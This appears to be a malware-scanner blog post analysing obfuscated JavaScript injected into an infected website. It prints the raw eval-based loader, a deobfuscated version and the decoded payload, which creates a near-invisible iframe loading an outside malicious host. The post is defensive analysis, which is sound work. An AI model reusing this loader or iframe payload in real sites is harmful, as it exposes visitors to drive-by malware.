JavaScript code injection generates hidden iframe to malicious website
Background
Online Website Malware Scanner has identified malicious JavaScript in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe which are invisible to the website user in order to download content from remote malware distributor.
This infected website hosts malicious JavaScript code injected in 126 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms.
This infected website hosts malicious JavaScript code injected in 126 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Wed Apr 10 05:21:44 2013
Infected website's files: 126
Detection of encoded suspicious JavaScript code in website's files:
Detection of encoded suspicious JavaScript code |
Threat dump:
[[ if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113,101,39,58,11,10,31,95,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,95,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,95,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,48,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,50,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,39,13,9,30,123,12,8,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e%26%26(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");}]]
Malware entry details
Beautified script
- if (021 === 0x11) v = "va" + "l";
- try {
- faweb++
- } catch (btawetb) {
- try {
- fve ^ v
- } catch (btawt4) {
- try {
- window.document.body = v
- } catch (gdsgsdg) {
- w = window;
- if (020 === 0x10) e = w["e".concat(v)];
- }
- }
- }
- if (1) {
- f = new Array(40, 101, 115, 110, 98, 114, 105, 110, 108, 40, 40, 11, 10, 122, 11, 10, 31, 116, 97, 113, 30,97, 31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110,115, 38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59, 12, 8, 13, 9, 30, 97, 45, 113, 114, 98, 30, 61, 31, 37, 104,115, 114, 112, 57, 45, 47, 102, 99, 116, 120, 109, 117, 113, 96, 101, 115, 44, 111, 113, 101, 39, 58, 11, 10, 31,95, 46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106,117, 115, 99, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38,46, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 48, 112,119, 37, 59, 12, 8, 32, 96, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 50, 111, 118,39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58,11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 13, 9,30, 105, 101, 38, 33, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64,121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 39, 13, 9, 30, 123, 12, 8, 32, 99, 109, 99, 116, 107,101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 109, 96, 112, 119,96, 98, 115, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114,46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39,40, 44, 97, 111, 110, 101, 109, 98, 67, 103, 103, 108, 99, 38, 97, 40, 57, 13, 9, 30, 125, 12, 8, 125, 40, 38, 41,58, 11, 10);
- }
- w = f;
- s = [];
- r = String;
- for (i = 0; - i + 412 != 0; i += 1) {
- j = i;
- if (e % 26 % 26(031 == 0x19)) s = s + r["fromCh" + "arC" + ((020 === 0x10) ? "ode" : "")]((1 * w[j] + j % 3));
- }
- try {
- (w + s)()
- } catch (asga) {
- e(s + "");
- }
Simplified version of web threat
- f = new Array(40, 101, 115, 110, 98, 114, 105, 110, 108, 40, 40, 11, 10, 122, 11, 10, 31, 116, 97, 113, 30, 97,31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110, 115,38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59, 12, 8, 13, 9, 30, 97, 45, 113, 114, 98, 30, 61, 31, 37, 104, 115,114, 112, 57, 45, 47, 102, 99, 116, 120, 109, 117, 113, 96, 101, 115, 44, 111, 113, 101, 39, 58, 11, 10, 31, 95,46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106,117, 115, 99, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38,46, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 48, 112,119, 37, 59, 12, 8, 32, 96, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 50, 111, 118,39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58,11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 13, 9,30, 105, 101, 38, 33, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64,121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 39, 13, 9, 30, 123, 12, 8, 32, 99, 109, 99, 116, 107,101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 109, 96, 112, 119,96, 98, 115, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114,46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39,40, 44, 97, 111, 110, 101, 109, 98, 67, 103, 103, 108, 99, 38, 97, 40, 57, 13, 9, 30, 125, 12, 8, 125, 40, 38, 41,58, 11, 10);
- s = ""
- for (i = 0; - i + 412 != 0; i += 1) {
- s = s + String.fromCharCode(1 * f[i] + i % 3);
- }
- eval(s);
Malicious payload
Decoded payload generates hidden iframe to http://getyourbet[.]org
- (function()
- {
- var a = document.createElement('iframe');
- a.src = 'http://getyourbet.org';
- a.style.position = 'absolute';
- a.style.border = '0';
- a.style.height = '2px';
- a.style.width = '2px';
- a.style.left = '1px';
- a.style.top = '1px';
- if(!document.getElementById('marwads'))
- {
- document.write('<div id=\'marwads\'></div>');
- document.getElementById('marwads').appendChild(a);
- }
- })();
Blacklisting status
McAfee | SiteAdvisor: "McAfee TrustedSource web reputation analysis found potential security risks with this site. Use with extreme caution."McAfee SiteAdvisor analysis |
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment